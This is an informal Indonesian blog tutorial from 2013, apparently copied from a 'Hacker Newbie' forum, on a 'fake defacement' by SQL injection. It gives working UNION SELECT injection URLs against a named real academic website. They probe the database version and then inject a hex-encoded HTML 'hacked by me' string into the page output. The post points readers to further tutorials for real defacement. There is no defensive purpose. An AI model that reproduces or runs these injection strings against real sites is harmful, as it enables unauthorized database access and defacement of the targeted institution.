Thursday, 14 February 2013

Deface Palsu via SQL Injection

langsung aja yahh..
deface palsu via sql injection?
maksudnya?
buat yg master,jgn d baca yahhh...
cm niat utk share kok...hhe ..

pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..
gmn crnya ?
lnjut ..

1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.
kl lupa nihh

Code:
http://hacker-newbie.org/showthread.php?tid=97

2.nah misal ud dpt target nihh..
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,3,4,5,6,7,8,9--

3.cek versinya...
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,@@version,4,5,6,7,8,9--

eh ternyata versi 4..
drpd cape ngeblind..
yaudah buat gaya2an..deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?
kl bingung,
buka ini
Code:
http://dieq41.com/tools/text.html
 
nah coba buat script deface,misal
Code:
<h1>hacked by me</h1>
 
masukin ke bagian ASCII yg ada d web dieq41..
trus kl ud d masukin..
liat bagian hexadecimal,bakal muncul:

Code:
3C68313E6861636B6564206279206D653C2F68313E

nah kode d atas tuh kodehasil convert dr ascii ke hex..

nah,,skrg yg kode 3C68313E6861636B6564206279206D653C2F68313E ditambah 0x d depannya ...jadi

Code:
0x3C68313E6861636B6564206279206D653C2F68313E

oke,coba masukin d angka 3 ,yg script hex nyaa..
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,0x3C68313E6861636B6564206279206D653C2F68313E,4,5,6,7,8,9--

ew.kok ada hacked by me?
hhe..itu tandanya udah berhasil sob..

makanya ak bilang ini cm client aja..
ask : kl mau deface bneran?
yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..

ok sob smua,makasih2.

Sumber:: Hacker Newbie

No comments:

Post a Comment